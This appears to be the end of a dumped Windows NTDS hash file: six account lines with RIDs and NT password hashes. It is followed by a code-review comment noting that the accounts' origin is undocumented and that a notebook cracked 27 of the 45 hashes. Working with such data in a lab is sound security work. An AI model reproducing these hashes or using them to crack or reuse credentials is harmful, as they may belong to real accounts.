user35:1140:aad3b435b51404eeaad3b435b51404ee:7b7b36c886e37d0a569de1eac512cf89:::
user36:1141:aad3b435b51404eeaad3b435b51404ee:4626a36dd0eccfcf71e13868990aaada:::
user37:1142:aad3b435b51404eeaad3b435b51404ee:c38307aa05d879e26becaa8156421571:::
user38:1143:aad3b435b51404eeaad3b435b51404ee:d97004b9867c89bdae80a4673d45ac0d:::
user39:1144:aad3b435b51404eeaad3b435b51404ee:b7ea6aa900be567c319f60add47db080:::
user40:1145:aad3b435b51404eeaad3b435b51404ee:28a198884cf2e2f4a7982333e89bd344:::
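Review bot: nothing in this new file or in the README hunk says where these 45 accounts come from. State in the README that they are lab-generated test entries (or replace them if they are not), and reference the file from the workflow, which still uses the placeholder `DOMAIN.LOCAL.ntds`. The notebook output in this commit reports `Hashes: 45 digests` and `Removed 27 hashes found in potfile`, which matches the 45 lines here, so the sample was evidently run through the notebook; that is one more reason to document its origin next to the file.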